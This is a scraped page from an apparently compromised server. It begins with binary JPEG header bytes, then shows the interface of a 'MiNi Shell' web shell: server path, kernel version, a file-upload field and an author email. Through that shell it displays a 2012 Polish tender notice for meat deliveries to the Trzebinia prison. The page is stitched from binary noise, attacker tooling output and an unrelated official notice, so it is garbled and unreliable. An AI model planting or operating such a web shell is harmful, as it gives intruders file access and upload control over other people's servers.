JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120605/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120605/189282-N-2012.html

<p class="kh_header"><b>Trzebinia: Dostawy mięsa i produktów mięsnych dla potrzeb Zakładu Karnego w Trzebini</b><br>
<b>Numer ogłoszenia: 189282 - 2012; data zamieszczenia: 05.06.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Karny , ul. Słowackiego 70, 32-540 Trzebinia, woj. małopolskie, tel. 032 6121374 w. 45, faks 032 6121551.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Organ kontroli państwowej lub ochrony prawa, sąd lub trybunał.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawy mięsa i produktów mięsnych dla potrzeb Zakładu Karnego w Trzebini.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia są sukcesywne dostawy mięsa i produktów mięsnych  dla potrzeb Zakładu Karnego w Trzebini. Dostarczane przedmioty zamówienia winny być w pierwszym gatunku, kategorii lub klasie jakości oraz z odpowiednim terminem ważności (przydatności do spożycia). Przedmioty zamówienia winny być dostarczane specjalistycznym transportem przystosowanym do przewozu żywności, zgodnie z obowiązującymi przepisami sanitarnymi i wymogami haccp. Dostawa przedmiotów zamówienia nastąpi na koszt i ryzyko Wykonawcy, ubezpieczonym transportem. Zamawiający wymaga dostarczania przedmiotów zamówienia w opakowaniach jednostkowych, szczelnych, spełniających wymagania higieny żywności. Opakowania są bezzwrotne, a ich koszt wliczony w cenę poszczególnych przedmiotów zamówienia. 

2.Przedmiot zamówienia obejmuje:  

pasztet cielęcy - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

parówki cielęce - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

polędwica drobiowa - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

szynka drobiowa - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

baleron drobiowy - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

kiełbasa drobiowa - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

kabanos drobiowy - ilość: 150 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy
-artykuł wyprodukowany wyłącznie z mięsa drobiowego, bez dodatków w postaci przypraw, warzyw i grzybów

parówki wieprzowe cienkie - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

parówki drobiowe cienkie - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

pasztetowa wieprzowa - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

pasztetowa drobiowa - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

salceson wieprzowy włoski - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

salceson wieprzowy brunszwicki - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

mielonka wieprzowa - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

mielonka drobiowa - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kiełbasa wieprzowa mortadela - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kiełbasa wieprzowa zwyczajna - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kiełbasa wieprzowa kanapkowa - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kiełbasa wieprzowa lunszmit - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kiełbasa wieprzowa regionalna - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kiełbasa wieprzowa węgierska - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

boczek wędzony - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

podgardle wędzone - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

kości wędzone - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

słonina wędzona - ilość: 700 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

porcje drobiowe rosołowe - ilość: 700 kg
kod CPV 15100000-9	
minimalny termin przydatności do spożycia 96 godz. od daty dostawy	

schab wieprzowy z kością - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

schab wieprzowy bez kości - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

łopatka wieprzowa z kością - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

łopatka wieprzowa bez kości - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

karczek wieprzowy z kością - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

karczek wieprzowy bez kości - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

mięso wieprzowe od szynki z kością - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

mięso wieprzowe od szynki bez kości - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy

mięso wieprzowe gulaszowe - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy
-mięso gulaszowe bez kości na przetwory z mięsa rozdrobnionego, bez tłuszczu zewnętrznego wraz z przylegającą do mięśni tkanką łączną, bez skórek, chrząstek oraz niejadalnych ścięgien i powięzi. 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia, zabezpieczone przed zanieczyszczeniem zgodnie z wymogami sanitarnymi i HACCP.

mięso wołowe gulaszowe - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy
-mięso gulaszowe bez kości na przetwory z mięsa rozdrobnionego, bez tłuszczu zewnętrznego wraz z przylegającą do mięśni tkanką łączną, bez skórek, chrząstek oraz niejadalnych ścięgien i powięzi. 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia, zabezpieczone przed zanieczyszczeniem zgodnie z wymogami sanitarnymi i HACCP.

mięso mielone wieprzowe - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy
-pakowane w opakowaniu w map. 
-mięso robione w wilku przez siatkę o średnicy oczek od 2 mm do 5 mm, równomiernie wymieszane. 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia, zabezpieczone przed zanieczyszczeniem zgodnie z wymogami
sanitarnymi i HACCP.

mięso mielone drobiowe - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 7 dni od daty dostawy
-pakowane w opakowaniu w map. 
-mięso robione w wilku przez siatkę o średnicy oczek od 2 mm do 5 mm, równomiernie wymieszane. 
-mięso czyste, bez śladów zanieczyszczeń, zapach swoisty, charakterystyczny dla mięsa, bez oznak zaparzenia i rozpoczynającego się psucia, zabezpieczone przed zanieczyszczeniem zgodnie z wymogami sanitarnymi i HACCP.

kaszanka wieprzowa - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

wątroba wieprzowa - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

ćwiartka tylna świeża z kurczaka - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

filet z piersi kurczaka świeży - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

flaki wołowe gotowane - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

wątróbka drobiowa - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

żołądki drobiowe - ilość: 800 kg
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

serduszka drobiowe - ilość: 800 kg	 
kod CPV 15100000-9
minimalny termin przydatności do spożycia 96 godz. od daty dostawy

3.Podane ilości są szacunkowe i w czasie obowiązywania umowy mogą ulec zmianie, co oznacza, że nie stanowią ostatecznego wymiaru zamówienia w wyniku, czego nie mogą być podstawą do zgłaszania roszczeń z tytułu nie zrealizowanych dostaw lub podstawą do odmowy realizacji dostaw. Zamawiający zastrzega sobie prawo zmniejszenia lub zwiększenia poszczególnego asostymentu, który obejmuje przedmiot zamówienia w zależności od ilości osadzonych oraz wysokości stawki żywieniowej przypadającej na jednego skazanego. Dostawcy będzie przysługiwało prawo do wynagrodzenia wyłącznie za faktycznie dostarczone ilości towaru.

4.Oferty należy składać na całość przedmiotu zamówienia. Wymagany jest pełen wyszczególniony w nim asortyment. Zamawiający nie dopuszcza możliwości składania ofert częściowych..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 15.10.00.00-9.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2010.113.759 j.t. ze zm.).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2010.113.759 j.t. ze zm.).</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2010.113.759 j.t. ze zm.).</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2010.113.759 j.t. ze zm.).</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Oświadczenie o spełnianiu warunków udziału w postępowaniu zgodnie z art. 22 ust. 1 ustawy z dnia 29 stycznia 2004 r. - Prawo zamówień publicznych (Dz.U.2010.113.759 j.t. ze zm.).</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

</ul></li>
<li>
</li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.Druk Formularz ofertowy, który należy sporządzić wg wzoru druku załączonego przez zamawiającego.

2.W przypadku podpisania oferty wraz z załącznikami przez osobę upoważnioną do reprezentowania wykonawcy należy złożyć pełnomocnictwo. Pełnomocnictwo winno być złożone w oryginale lub też w kopii poświadczonej za zgodność z oryginałem przez notariusza. Pełnomocnictwo winno być wystawionego nie wcześniej niż 6 miesięcy przed upływem składania ofert.

3.W celu prawidłowej identyfikacji wykonawcy, który złożył ofertę, zamawiający prosi załączyć do oferty aktualny odpis z właściwego rejestru np. odpis z krajowego rejestru sądowego lub wypis z ewidencji działalności gospodarczej. Odpis lub wypis winny być wystawione nie wcześniej niż 6 miesięcy przed upływem składania ofert.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.zp.sw.gov.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Dział Kwatermistrzowski
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 13.06.2012 godzina 08:30, miejsce: Sekretariat
Zakład Karny w Trzebini
ul. Słowackiego 70
32-540 Trzebinia.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> do 30.06.2012.</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Nie dotyczy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com